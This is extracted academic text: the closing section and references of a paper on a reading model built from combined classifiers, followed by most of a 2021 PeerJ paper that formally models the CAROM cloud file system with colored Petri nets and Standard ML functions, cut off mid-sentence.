0.14 0.16 0.18 0.21 0.24 0.27 0.31 Decision Tree 0.02 0.04 0.05 0.07 0.08 0.11 0.12 0.13 0.15 0.17 Gauss Bayesian algorithm 0.025 0.04 0.08 0.1 0.11 0.11 0.14 0.17 0.19 0.23 150 300 450 600 750 900 1050 1200 1350 1500 0 0.05 0.1 0.15 0.2 0.25 0.3 0.35 F -M e a su r Figure 7. F-Measure comparison International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 113 Experiment in figure 6, the X-axis represents the amount of data in the experiment, and the Y-axis represents accuracy, which shows that comparing with the three algorithms of decision tree, Bagging and Gauss Bayes, the combination algorithm has a slightly better accuracy. in figure 7, the X- axis represents the amount of data, and the Y-axis represents the F-Measure. The F-Measure of the combined algorithm is obviously superior to other three separate algorithms. V. CONCLUSION The reading model constructed in this paper makes reading more intelligent. Aiming at the problem of natural language input, the corresponding answer can be given according to the existing TXT content. According to the experimental data, it can be concluded that the intelligent reading model based on the combination of decision tree, Bagging and Gauss Bayesian algorithm has a good classification ability. REFERENCES [1] Xi Xuefeng, Zhou Guodong. A study of Deep Learning for Natural language processing [J]. Journal of Automation! 42 (10): 1445-146 [2] Chen Lian. Research and Application of key Interactive Technology based on Web Intelligent Education platform [D]. Graduate School of Chinese Academy of Sciences (Chengdu Institute of computer Application). [3] Han Dongxu, Chang Baobao. Domain adaptability method of Chinese word Segmentation Model [J]. Journal of computer Science, China (02): 272-281. [4] Yang Bin, Han Qingwen, Lei Min, Zhang Yapeng, Liu Xiangguo, Yang Yaqiang, Ma Xuefeng. Short text Classification algorithm based on improved TF-IDF weight [J]. Journal of Chongqing University of Technology (Natural Science) 30 (12): 108-113. [5] Qian Cheng, Yang Xiaolan, Zhu Fuxi. Python-based web crawler technology [J]. Heilongjiang Science and Technology Information 2016 (36): 273. [6] Wang Daoming, Lu Changhua, Jiang Weiwei, Xiao Mingxia, Li inevitable. Research on decision Tree SVM multiple Classification method based on Particle Swarm Optimization algorithm [J]. Journal of Electronic Measurement and Instruments 29 (04): 611-615. [7] Bi Kai, Wang Xiaodan, Yao Xu, Zhou Jindeng. An adaptive selective integration based on bagging and confusion matrix [J]. Chinese Journal of Electronic Science (EJ). 42 (04): 711-716. [8] Zhu Mingmin. Study on Bayesian Network Structure Learning and reasoning [D]. Xi'an University of Electronic Science and Technology. [9] Zan Hongying, Zuo Weisong, Zhang Kunli, Wu Yunfang. A study on emotion Analysis combined with rules and Statistics [J]. Computer Engineering and Science 33 (05): 146-150. [10] Gu Yijun, Fan Xiaozhong, Wang Jianhua, Wang Tao, Huang Weijin. Automatic selection of Chinese stops word list [J]. Beijing Institute of Technology Proceedings 2005 (04): 337-340. [11] Liu Qinghe, Liang Zhengyou. A feature selection method based on information gain [J]. Computer Engineering and applications 47 (12): 130-132 + 136. [12] Huang Yuda, Fan Taihua. Analysis and Optimization of decision Tree ID3 algorithm [J]. Computer Engineering and Design! 33 (08): 3089- 3093. [13] Liu Jian, Wu Yi, Tan Lu. Improvement of bootstrap method for self- help sampling [J]. Mathematical Theory and Application 2006 (01): 69-72. work_ubkaeukuajb4nfg6rg52icqrbe ---- Petri Net based modeling and analysis for improved resource utilization in cloud computing Petri Net based modeling and analysis for improved resource utilization in cloud computing Muhammad Rizwan Ali1, Farooq Ahmad2, Muhammad Hasanain Chaudary2, Zuhaib Ashfaq Khan3, Mohammed A. Alqahtani4, Jehad Saad Alqurni5, Zahid Ullah6 and Wasim Ullah Khan7 1 Department of Computer Science, Western Norway University of Applied Sciences, Bergen, Norway 2 Department of Computer Science, COMSATS University Islamabad, Lahore Campus, Lahore, Pakistan 3 Department of Electrical & Computer Engineering, COMSATS University Islamabad, Attock Campus, Attock, Pakistan 4 Department of Computer Information Systems, College of Computer Science and Information Technology, Imam Abdulrahman Bin Faisal University, Dammam, Saudi Arabia 5 Department of Educational Technology, College of Education, Imam Abdulrahman Bin Faisal University, Dammam, Saudi Arabia 6 Department of Information Systems, Faculty of Computing and Information Technology, King Abdulaziz University, Jeddah, Saudi Arabia 7 School of Electrical Engineering and Automation, Wuhan University, Wuhan, China ABSTRACT The cloud is a shared pool of systems that provides multiple resources through the Internet, users can access a lot of computing power using their computer. However, with the strong migration rate of multiple applications towards the cloud, more disks and servers are required to store huge data. Most of the cloud storage service providers are replicating full copies of data over multiple data centers to ensure data availability. Further, the replication is not only a costly process but also a wastage of energy resources. Furthermore, erasure codes reduce the storage cost by splitting data in n chunks and storing these chunks into n + k different data centers, to tolerate k failures. Moreover, it also needs extra computation cost to regenerate the data object. Cache-A Replica On Modification (CAROM) is a hybrid file system that gets combined benefits from both the replication and erasure codes to reduce access latency and bandwidth consumption. However, in the literature, no formal analysis of CAROM is available which can validate its performance. To address this issue, this research firstly presents a colored Petri net based formal model of CAROM. The research proceeds by presenting a formal analysis and simulation to validate the performance of the proposed system. This paper contributes towards the utilization of resources in clouds by presenting a comprehensive formal analysis of CAROM. Subjects Algorithms and Analysis of Algorithms, Computer Education, Data Science Keywords Cloud computing, Replication, Colored Petri net, Formal analysis INTRODUCTION Cloud computing is an emerging paradigm of information technology. Moreover, cloud computing is an IT criterion that provides universal access to shared pools of system resources through the Internet. The resources can be provided on demand on pay or in the How to cite this article Rizwan Ali M, Ahmad F, Hasanain Chaudary M, Ashfaq Khan Z, Alqahtani MA, Saad Alqurni J, Ullah Z, Khan WU. 2021. Petri Net based modeling and analysis for improved resource utilization in cloud computing. PeerJ Comput. Sci. 7:e351 DOI 10.7717/peerj-cs.351 Submitted 30 October 2020 Accepted 7 December 2020 Published 8 February 2021 Corresponding author Muhammad Hasanain Chaudary, mhchaudary@cuilahore.edu.pk Academic editor Muhammad Asif Additional Information and Declarations can be found on page 19 DOI 10.7717/peerj-cs.351 Copyright 2021 Rizwan Ali et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.351 mailto:mhchaudary@�cuilahore.�edu.�pk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.351 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ form of a subscription. With Internet access growth, cloud computing is emerging in the industry, academia, and society. Due to a large number of resources, the cloud uses virtualization for resource management. Further, clouds need to stimulate data centers’ design so that data can be readily available to users anywhere in the world (Buyya et al., 2009). Services There are four different services in cloud computing. Software as a Service Software as a Service (SaaS) is a multi-tenant platform that enables cloud users to deploy their applications to the hosting environment. Further, it supports different cloud applications in a single logical environment to achieve optimization in terms of speed, security, availability, scalability, and economy (Dillon, Wu & Chang, 2010). Platform as a Service Platform as a Service (PaaS) facilitates the cloud user to organize, develop and manage various applications through a complete “software development lifecycle”. Further, it also eliminates the requirement of an organization to traditionally build and maintain the infrastructure, to develop applications (Sajid & Raza, 2013). By using SaaS, cloud users can host different applications while PaaS offers a platform to develop different applications (Dillon, Wu & Chang, 2010; Sajid & Raza, 2013). Infrastructure as a Service It offers direct access to resources such as storage, computer, and network resources used for processing (Dillon, Wu & Chang, 2010). Infrastructure as a Service (IaaS) sets up an independent virtual machine (VM) to transform the architecture of the application so that multiple copies can be executed on a single machine. Moreover, it provides access to the infrastructure and delivers additional storage for network bandwidth of the corporate web servers and data backups. An important feature of IaaS is that extensive computing can also be switched on, which previously was only accessible to people with the facility of high power computers. Database as a Service Database as a Service (DaaS) is a self-service cloud computing model. In DaaS, user request database services and access to the resources. DaaS provides a shared, consolidated program to provide database services on a self-service model (Mateljan, Čišić & Ogrizović, 2010). Deployment models Based on environmental parameters including openness, storage capacity and proprietorship of the deployment infrastructure, one can choose a deployment model from the types of cloud deployment models given below. The following are the types of cloud computing available in the literature. Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 2/22 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ Public cloud Generally, public clouds may be owned and managed by academic or government organizations and it is used by common users and the public. In the traditional regular sense, in public cloud sources, the internet is delivered dynamically and based on self-service via the Internet by an external supplier who shares resources (Ahmed et al., 2012). Moreover, security issues occur in such types of clouds and are more prone to attack. That is why the user has access to the public cloud via the correct validations (Sajid & Raza, 2013). Private cloud Such kind of infrastructure only works for a specific organization while off-premise private cloud is used by one company and the infrastructure is implemented by another company (Ahmed et al., 2012). There is no restriction of network bandwidth, security risks, and legal requirements in a private cloud, and data is managed within the organization, which is not permitted in a public cloud (Kamboj & Ghumman, 2016). Hybrid cloud It is a combination of two or more separate cloud infrastructures (public or private) and forms another type of cloud, the so-called hybrid cloud. This concept is also known as cloud bursting where several integrated cloud infrastructures remain unique entities (Mell & Grance, 2011). Hybrid cloud facilitates organizations to shift overflow traffic to the public cloud to prevent service interruption. Federated cloud To handle the site failure, cloud infrastructure providers have established different data centers at different geographic locations to ensure reliability. However, this approach has many shortcomings, one problem is that the cloud users may find it difficult to know which remote location is best for their application to host. Cloud service providers have a finite capacity and it is difficult for a cloud infrastructure provider to set up different data centers at different geographic locations. This is why different providers of cloud services fall under one umbrella and form a federated cloud (Varghese & Buyya, 2018). In times of work overload, cloud federation offers the opportunity to avail available computational, cost-effective, on-demand, and reliable storage options to other cloud service providers (Buyya, Ranjan & Calheiros, 2010). For example, an EU-based EGI federated cloud shares 300 data centers with 20 cloud providers. Issues Current data centers are hosting multiple applications having time latency from a few seconds to multiple hours (Patterson, 2008). The main focus of Cloud computing is to provide a performance guarantee and to take care of data privacy. With the high growth rate of data on the Cloud, more massive servers’ need is rising day by day. Demand for higher performance is being fulfilled by replicating data in multiple data centers worldwide without thinking about energy consumption. Further, on average, every data center utilizes as much energy as 25,000 households. Data centers are costly and unfavorable for the Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 3/22 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ environment, as they emit more carbon than both Argentina and the Netherlands (Patterson, 2008). Need of cache-a replica on modification Cache-A Replica On Modification (CAROM) is a hybrid cloud file system that merges the benefits of both replication and erasure codes. Figure 1 reflects the process flow of CAROM. CAROM has a cache at each data center. Cache points out the local access, and every data center performs as a primary data center. The data object which is frequently accessed is stored in the cache to avoid the extra computational cost. In contrast, those objects that are accessed rarely are divided into m data chunks. Further, distribute them among n + k data nodes, tolerate k failures, and take the storage cost to a minimum and make the data center environment friendly (Ma et al., 2013). Contribution of research Formal methods are mathematical methods used to model or specify any system. Petri net provides strong mathematical and graphical representations to incorporate concurrency, sequential execution, conflicts, determinism, resource sharing, timing information, communication, synchronization, and distribution in the underlying system. This paper's primary goal is to develop a data scheduling model based on colored Petri net (CPN), which utilizes CAROM to reduce storage cost and bandwidth latency. Statistical analysis is provided to elucidate the performance of the model. Simulation is performed, and verification is also presented of the proposed model. The rest of the article is organized as follows: “Related Work” presents related work. “Colored Petri Nets” presents basic terminology, notations, and graphical convention about Petri Nets. “Formal Model of CAROM” presents the formal modeling of the CAROM based data scheduling framework. “Simulation” presents a formal analysis of the Figure 1 CAROM process flow. Full-size DOI: 10.7717/peerj-cs.351/fig-1 Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 4/22 http://dx.doi.org/10.7717/peerj-cs.351/fig-1 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ developed model. “Analysis” presents the simulations, its results, and the discussion on it. “Conclusion” concludes our work and gives final thoughts about the strengths and weaknesses of our approach. RELATED WORK In the cloud, resource scheduling is a challenging field (Mathew, Sekaran & Jose, 2014). Magnificent work has been done in resource scheduling in the cloud. Some approaches are relevant to resource scheduling in the cloud. This approach’s immediate attention is to optimize time performance, like completion time, total delay, and response time (Mathew, Sekaran & Jose, 2014). Zhan et al. (2015) provides a detailed survey of cloud computing. Ant colony optimization algorithm for scheduling tasks according to budget is presented in Zuo et al. (2015). In Adil et al. (2015), a heuristic algorithm is proposed for task scheduling. Kumar & Verma (2012) presents a genetic algorithm to schedule independent tasks. In Mateescu, Gentzsch & Ribbens (2011), another genetic algorithm is presented that improves the makespan of resources. The authors of De Assunção, Di Costanzo & Buyya (2010) proposed an architecture that provides a platform for scientifically, high performance (HPC) applications. The cornerstone of the proposed architecture is the Elastic cluster, which expands the hybrid cloud environment (De Assunção, Di Costanzo & Buyya, 2010). Researchers in Mastelic et al. (2015) analyzed the assessment between performance and usage costs of various facilities algorithms for using resources from the cloud to expand a cluster capacity. The authors in Javadi, Abawajy & Buyya (2012) propose non-disruptive source facilities policies for hybrid cloud environments that they have evaluated using a model-based simulation instead of our real case study performance evaluation. Researchers in Mattess, Vecchiola & Buyya (2010) present a facility algorithm for expanding cluster capacity with Amazon EC2 Spot Organizations. Research work in Yuan et al. (2017) provides a profit maximization model for private proposals cloud providers using the temporal variation of prices in a hybrid cloud. Although they are similar to many others, they take time, and data and networks’ costs are negligible. However, all the algorithms in the literature were limited to static resources only. With the revolution of cloud computing, the number of data servers is increasing across the world. The construction of the data center is not only cost-effective but also not in favor of the environment. Much focus is given to energy-optimized resource scheduling in cloud computing. The researcher has proposed an aware energy model in the form of directed acyclic graphs in Gan, Huang & Gao (2010). In Zhao et al. (2016), two fitness functions are defined: job completion time and energy. A researcher in Shen et al. (2017) proposed a resource allocation technique that allocates resources to virtual machines taking care of energy. DVFS method has been presented in Hosseinimotlagh, Khunjush & Samadzadeh (2015), which schedules a single task and takes care of the voltage supply. One researcher in Wu, Chang & Chan (2014) has presented a virtual machine scheduling algorithm that achieves energy optimization and reduces host temperature. In Mhedheb et al. (2013), a method is presented to reduce both network and server power. Research work in Xia et al. (2015) scaled the voltage to Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 5/22 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ reduce energy costs. Scaled processor utilization and resource consolidation has been presented in Lee & Zomaya (2012) for energy optimization. All these methods focus on reducing the cost of energy without the care of job completion time. In Beloglazov, Abawajy & Buyya (2012), the researcher proposed energy- aware mapping of VMs to cloud servers as a problem with bin-packing, independent of the types of workload. Klein et al. (2014) presented a framework of brownout for energy optimization. All users have to bear either time latency or cost on a cloud file system. COLORED PETRI NETS Petri nets are bipartite directed graphs with the power of behavioral analysis of the modeled system through it. CPN is a mathematical technique used for modeling parallel systems and graphical analysis of their characteristics (Jensen, 2013; Milner, 1997; Ullman, 1998). CPN is the combination of Petri Net and Standard ML (Emerson & Sistla, 1996; Virendra et al., 2005). CPN allows defining some user-defined data types along with some standard declarations. It is a general-purpose modeling language and has the power to model parallel systems and analyze their performance. Formal Definition of CPN is presented below (Jensen & Kristensen, 2009): A net is a tuple N = (P, T, A, Σ, C, N, E, G, I) where: P is a set of places. T is a set of transitions. A is a set of arcs where P ∪ T=P ∩ A=T ∩ A=Ø Σ is a set of color sets C is a color function, that is, C: P → Σ N is a node function. It maps A into (P × T) ∪ (T × P). E is an arc expression function. It maps each arc a ∈ A into the expression e. G is a guard function. It maps each transition t ∈ T to a guard expression g. The output of the guard expression should evaluate to Boolean value: true or false. I is an initialization function. It maps each place p into an initialization expression i. We can map each place into a multi-set of tokens in CPN through a mapping function called Marking. Initial Marking reflects the initial state of a model. Final Marking represents the final state of the system. FORMAL MODEL OF CAROM For modeling, high-level architecture and the components of the system are identified in the first phase. After that, the identified components’ interaction points are defined for the smooth implementation of the component-based architecture. Further, a mixture of top-down and bottom-up approaches is adopted in this paper to model the framework. CAROM uses some part of the local storage disk as a cache. Whenever a written request of a new file is received, the complete file is stored in the reserved memory of each DC named as cache.Whenever the cache is near to be filled, the file least recently used is removed from the cache. It is distributed on n + k data nodes after dividing into n chunks. However, suppose a read request for a file is received. In that case, it is checked first in the nearest DC. If it is found, then it is downloaded directly, without any computational Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 6/22 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ cost. Whenever a request of that file is received that is not available in the cache. Data is regenerated from n data nodes out of n + k (Ma et al., 2013). The strategy discussed above is presented in the form of a flow chart (see Fig. 2). Hierarchical view of model Figure 3 depicts the hierarchical view of the model. Figure 2 File access process flow of CAROM. Full-size DOI: 10.7717/peerj-cs.351/fig-2 Figure 3 Hierarchical view of the model. Full-size DOI: 10.7717/peerj-cs.351/fig-3 Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 7/22 http://dx.doi.org/10.7717/peerj-cs.351/fig-2 http://dx.doi.org/10.7717/peerj-cs.351/fig-3 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ Colored Petri nets model In order to model the CAROM based framework using CPN, the components Sender, Data Center, and Receiver are developed. The Data Center component is further extended to Cache and DataNode sub-components, as shown in Fig. 3. Table 1 represents the color sets used in the model. As data types, the color sets are mapped to the places of the model given in Fig. 4. For instance, color set NO, in the third row of Table 1, is mapped to the place KEY while color set DATA, in the fourth row of Table 1, is mapped to the place Next_Key in the CPN model shown in Fig. 4. Moreover, product type color sets are constructed by taking the cartesian product of the color sets. For instance, the color set REQUEST in Table 1 is constructed using color sets NO, DATA, OP and NO. Table 2 represents the list of variables used in the model. A variable v is used in the arc inscription, and Type[v] ∈ Σ, to fetch the data from the place. Further, the variables construct arc expression, which is assigned to arc a through arc expression function Figure 4 Top level view of proposed scheme. Full-size DOI: 10.7717/peerj-cs.351/fig-4 Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 8/22 http://dx.doi.org/10.7717/peerj-cs.351/fig-4 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ E: A→EXPRV while Type[E(a)] = C(p)MS where EXPR is the set of expressions and MS is a multiset. A marking is a function M that maps each place p ∈ P into a multiset of tokens, that is, M(p) ∈ C(p)MS. Table 3 shows values (tokens) to represent the initial marking. Arc expressions are evaluated by assigning the values to the variables in the expressions. Table 1 Color sets of the model. Color set Defination colset UNIT = unit; Unit color set colset BOOL = bool; Boolean color set colset toa = int; closet NO = int; Integer color sets colset DATA = string timed; Timed string color set colset OP = string timed; Timed string color set colset REQUEST = product NO × DATA × OP × NO timed; Timed product of color set NO of type int, color set DATA of type string, color set OP of type string and color set NO of type int. colset File= product NO × DATA × toa timed; Timed product of color set NO of type int, color set DATA of type string and color set toa of type int. colset ND=product NO × DATA timed; Timed product of color set NO of type int and color set DATA of type string. colset RR=product NO × NO timed; Timed product of color set NO of type int and color set NO of type int. colset RRL=list RR timed; Timed list of color set RR. colset nkd=product NO × NO × DATA; Product of color set NO of type int, color set NO of type int and color set DATA of type string. colset RecData = list nkd timed; Timed list of color set nkd. colset PACKET = union Data:nkd timed ; Union of type Data(int*int*string), colset sendData= product NO × NO × DATA timed; Timed product of color set NO of type int, color set NO of type int and color set DATA of type string. colset sendList=list sendData timed; Timed list of color set sendData. colset cache = product NO × DATA × NO timed; Timed product of color set NO of type int, color set DATA of type string and color set NO of type int. colset CacheList = list cache timed; Timed list of color set cache. colset CacheHit= product NO × CacheList timed; Timed product of a color set NO of type int and color set CacheHit of type list. colset rcvSplit = product NO × PACKET; Product of color set NO of type int and color set PACKET of type union. colset packet=list PACKET timed; Timed list of color set PACKET of type union. Table 2 Variables of the model. Variable Defination var p:PACKET; Variables of colour set PACKET. var pak:packet; Variable of colour set packet. var d,data,next:DATA; Variables of colour set DATA. var n,n1,id,k,k1,X1,X2,X3:NO; Variables of colour set NO. var cl:CacheList; Variables of colour set CacheList. var sl:SendList; Variable of colour set SendList. var c:cache; Variable of colour set cache. var rd,sd:RecData; Variables of colour set RecData. var req,e:REQUEST; Variables of colour set REQUEST. Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 9/22 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ Further, expressions can be converted into functions to be mapped to arcs. Table 4 represents the functions used in this model. Main module We first identified high-level components of the system, and then each component is step-wise refined. For such a purpose, hierarchical colored Petri nets are appropriate formalism to make the model more straightforward and understandable. Figure 4 depicts the top-level view of the model. This is a hierarchical model in which multiple substitution transitions connect with places. A substitution transition has its own definition. Therefore, groups are identified from the detailed Petri net model and converted into substitution transitions. There are twenty places and ten transitions, including seven substitution transitions, named Cache, Store-DB, DB1, DB2, DB3, ReGenerate-Data and Receiver. Cache module This module aims to decide whether the data will be directly available from cache or reconstruct it from n different data centers. Figure 5 shows the CPN cache module, and it has ten places and four transitions. Two places are in-sockets and six are out-sockets. Whenever a token is added in the place “Check Cache” with operation value “READ”, it is sent to transition “Cache Checked”, which also receives a “cacheList” from the place “Cache”. Function member is a Boolean function. It returns true if the key of token coming from the place “Check Cache” is found from cacheList (see Table 4 for all declared functions). If member function returns true, then the function retrieve will get the data against key from the cache. Further, the function sends data to place “Cache Hit” and restores that data object in the cache. In contrast, function updateLife will increment the value of the life of this object by 1. On the other side, if the function member returns false, then the key is sent to all available data centers through “CacheMiss”. Whenever a token is reached in place “Send to Cache” with operation value “WRITE”, it causes enabling of the transition “Store_in_Cache” which can only be fired when the cache is not full. Moreover, if the cache is not full and no data object is found with the same key, then token is sent to place “Cache” and inserted on the head of the cacheList. However, if the cache is full, then the token waits in place “Send to Cache” until the function sort arranges the cacheList with respect to life of data objects. Further, the data object having the least life is removed from cache, and it is sent to place “Split & Distribute”. If the Table 3 Initializations of the model. Initial marking val db1=1`[Data(1,1,"C"),Data(2,1,"O"),Data(3,1,"E"),Data(4,1,"P")]@0; val db2=1`[Data(1,2,"O"), Data(2,2,"U"),Data(3,2,"D"),Data(4,2,"E")]@0; val db3=1`[Data(1,3,"L"),Data(2,3,"R"),Data(3,3," "), Data(4,3,"T")]@0; val AllRequest= 1`(1,"COL","WRITE",0)@0 +++ 1`(2,"OUR","WRITE",0)@0+++ 1`(3,"ED ","WRITE",0)@0+++ 1`(1," ","READ",0)@0+++ 1`(2," ","READ",0) @0+++ 2`(4,"PET","WRITE",0)@0+++ 1`(5,"RI ","WRITE",0)@0+++ 1`(5," ","READ",0)@0; Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 10/22 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ Table 4 Functions of the model. Function Purpose fun check(n,k) = if(n>k) then n else k; Enable transition if first token has greater value fun wait() = discrete(10,100); Wait for a random time unit between 10 and 100 fun check1(n,k) = if n=k then k+1 else k; Increment if both tokens have same value fun success() = discrete(1,10)<=9; To check either random number is less than 9 fun success1(n,d) = if success() then 1`(n,d) else empty; Enable transition if random number is less than 9 fun success2(k) = if success() then 1`k else empty; Enable transition if random number is less than 9 fun transmit(n,k,d) = if n=k then 1`d else empty; Enable transition if both tokens have same value fun transmit1(n,k) = if n>k then 1`k else empty; Enable transition if first token has greater value fun read(req:REQUEST) = if #3(req)="READ" then 1`(#1(req)) else empty; Enable transition with 1st argument of request if 3rd argument of request is “READ” fun write(req:REQUEST)= if #3(req)="WRITE" then 1`req else empty; Enable transition with whole request if 3rd argument of request is “WRITE” fun length [] = 0 | length ( h :: t ) = 1+length t; Return length of a list fun cacheMember(req:REQUEST,[])=false | cacheMember(req,(n,d, k)::t)=if(#1(req))=n then true else cacheMember(req,t); Check either a file exist in cache or not fun store(req:REQUEST,cl:CacheList) = ifcacheMember (req,cl) then cl else (#1(req),#2(req),#4(req))::cl; Store a file on cache fun member (k1,[]) = false | member (k1,(k2,v2,k3)::t) =if k1=k2 then true else member (k1,t); Check either a token exist in a list or not fun member2((k,n,d),[])=false| member2((k,n,d),(k1,n1,d1)::t)=if k=k1 andalso n=n1 andalso d=d1 then true else member2((k,n,d),t); Check either a token exist in a list or not fun remDup((k,n,d),sd)= if member2((k,n,d),sd) then sd else (k,n,d)::sd; Remove duplications fun insert((k,n,d),[])=[(k,n,d)] | insert((k,n,d),(k1,n1,d1)::t)=if n<=n1 then (k,n,d)::(k1,n1,d1)::t else (k1,n1,d1)::insert((k,n,d),t); Insert in a list fun insert1((n,d,k),[])=[(n,d,k)] | insert1((n,d,k),(n1,d1,k1)::t)=if k<=k1 then (n,d,k)::(n1,d1,k1)::t else (n1,d1,k1)::insert1((n,d,k),t); Insert in a list fun insert3((k,n,d),[])=[(k,n,d)] | insert3((k,n,d),(k1,n1,d1)::t)=if n<n1 then (k,n,d)::(k1,n1,d1)::t else (k1,n1,d1)::insert3((k,n,d),t); Insert in a list fun sort[] = [] | sort ( (n,d,k)::t)= insert1((n,d,k),sort t); Sort with respect to least frequently used fun sort1[]=[] | sort1((k,n,d)::t) = insert3((k,n,d),sort1 t); Sort with respect to least frequently used fun member1(k1,[])=false | member1 (k1,(k,k2,v2)::t)= if k1=k2 then true else member1(k1,t); Check either a token exist in a list or not fun recData(k,n1,d,rd)=if member1(n1,rd) then rd else insert((k,n1, d),rd); Reconstruct data fun checkDB(k,[])=false | checkDB(k,Data(k1,k2,v)::t) = if k=k1 then true else checkDB(k,t); Check data in data base fun recD1(k,Data(k1,k2,v)::t,rd,recData)=if k=k1then recData(k1,k2, v,rd) else recD1(k,t,rd,recData); Enable transition if data is regenerated fun found(k,pak,rd,recD1)=if checkDB(k,pak) then recD1(k,pak,rd, recData) else rd; Enable transition if data is found in data base fun notFound(k,pak)=if checkDB(k,pak) then empty else 1`k; Enable transition if data is not found in data base fun retrieve(k1,[]) = "NOT FOUND" | retrieve (k1,(k2,v2,k3)::t) = if k1=k2 then v2 else retrieve(k1,t); Retrieve data from data base (Continued) Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 11/22 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ cache is not full but the cacheList has a record with the same key, then token will be sent to place “Already Exist In Cache” by firing the transition “Send to Cache”. Store in DB module Figure 6 shows the Store in DB module of the model. It has two places and one transition. One place is in-socket and one place is out-socket. Whenever the cache is full, the data object with the least life is removed from the cache, and a token is added in the place “Split & Distribute”. This token enables the transition “Split Data”. Then function Split is Table 4 (continued). Function Purpose fun cacheHit(member,retrieve,k,cl) = if member(k,cl) then 1`retrieve (k,cl) else empty; Signal to show data is available in cache fun cacheMis(member,k,cl)= if member(k,cl) then empty else 1`k; Signal to show data is not available in cache fun SendTok(k1,k2,k3,k4) = if k3="WRITE" then 3`(k1,k2,k3,k4) else 1`(k1,k2,k3,k4); Enable either read or write transition fun updateLife(k,(k1,v1,k2)::t) = if k=k1 then (k1,v1,k2+1) ::t else updateLife(k,t); Update frequency fun SplitData(n,d)= let val p1 = packetLength; fun splitdata (n,k,d) = let val d1 = String.size(d) in if d1<=p1 then [(n,k,d)] else (n,k, substring (d,0,p1)):: splitdata(n,k+1,substring(d,p1,d1-p1)) end; in splitdata(n,1,d) end; Split data fun Split(k,data) = ( List.map(fn (n,n1,d)=>Data(n,n1,d))(SplitData (k,data))); Split data in n+k chunks Figure 5 Cache module. Full-size DOI: 10.7717/peerj-cs.351/fig-5 Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 12/22 http://dx.doi.org/10.7717/peerj-cs.351/fig-5 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ called, which divides the data value into n data chunks. All the n chunks are sent to place “Distribute” for distribution among n + k databases. DB module This module is to retrieve the n data chunks from n + k data centers. DB module contains three in-sockets and two out-sockets. Figure 7 illustrates the DB module of the model. It has seven places and two transitions. Three places are in-sockets, two places are out-sockets and one place is in-out-socket. Whenever a token is reached in place “Distribute”, it is stored in the database along with its unique key. Whenever a token having a key is added in the place “CacheMiss”, transition “GetData” will check the data chunks against that key. If it is found, then the data chunk and its key will be sent to place “Reconstruct Data”, which will get n data chunks from n + k data bases to re-generate the original data with the tolerance of k failures. Regenerate data module This module is to combine n data chunks to reconstruct data into its original form. Figure 8 shows the ReGenerate-Data module of the model. This module has nine places and four transitions. Two places are in-out-sockets and four are out-sockets. In this module, when we need to reconstruct data the place “Reconstruct_Data” receives all data chunks against the search key from all available databases. Transition “RecD” remains enable until all data chucks move from place “Reconstruct_Data”. Then, on arc between the transition “RecD” and the place “Rec” the function remDup (see Table 4) is called, and it removes all the duplications of data chunks. After that, the function sort1 is called. It sorts data chunks to recontruct the data. The place “Reconstruct” holds the token with data in its original form. This place sends data the place “Reg Data”, which sends the data towards substitution transition “Receiver”. Figure 6 Store in DB module. Full-size DOI: 10.7717/peerj-cs.351/fig-6 Figure 7 DB module. Full-size DOI: 10.7717/peerj-cs.351/fig-7 Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 13/22 http://dx.doi.org/10.7717/peerj-cs.351/fig-6 http://dx.doi.org/10.7717/peerj-cs.351/fig-7 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ Receiver module Figure 9 shows the Receiver module. This module is to ensure that data is ultimately transmitted and received by the user. The receiver module has fifteen places and eleven transiotions. Two places are in-sockets and one is out-socket. In this module, whenever a token is reached in Place “Y” or “CacheHit” it is sent towards the place “Send Queue”. When token from the place “Send Queue” enables the transition “Send1” then chances of Figure 8 Regenerate data module. Full-size DOI: 10.7717/peerj-cs.351/fig-8 Figure 9 Receiver module. Full-size DOI: 10.7717/peerj-cs.351/fig-9 Rizwan Ali et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.351 14/22 http://dx.doi.org/10.7717/peerj-cs.351/fig-8 http://dx.doi.org/10.7717/peerj-cs.351/fig-9 http://dx.doi.org/10.7717/peerj-cs.351 https://peerj.com/computer-science/ token lost are 90% over a network. If the token is lost, then place “Timer” will receive the token. That token will be sent again to avoid the deadlock situation. If the token is sent to place C to enable the transition “Receiver” then the transition sends data in place “Response.” Further, the transition “TransmitAck” sends acknowledgment towards the place “Ack Received”, which on receiving the token enables the transition “Remove” which causes to remove that 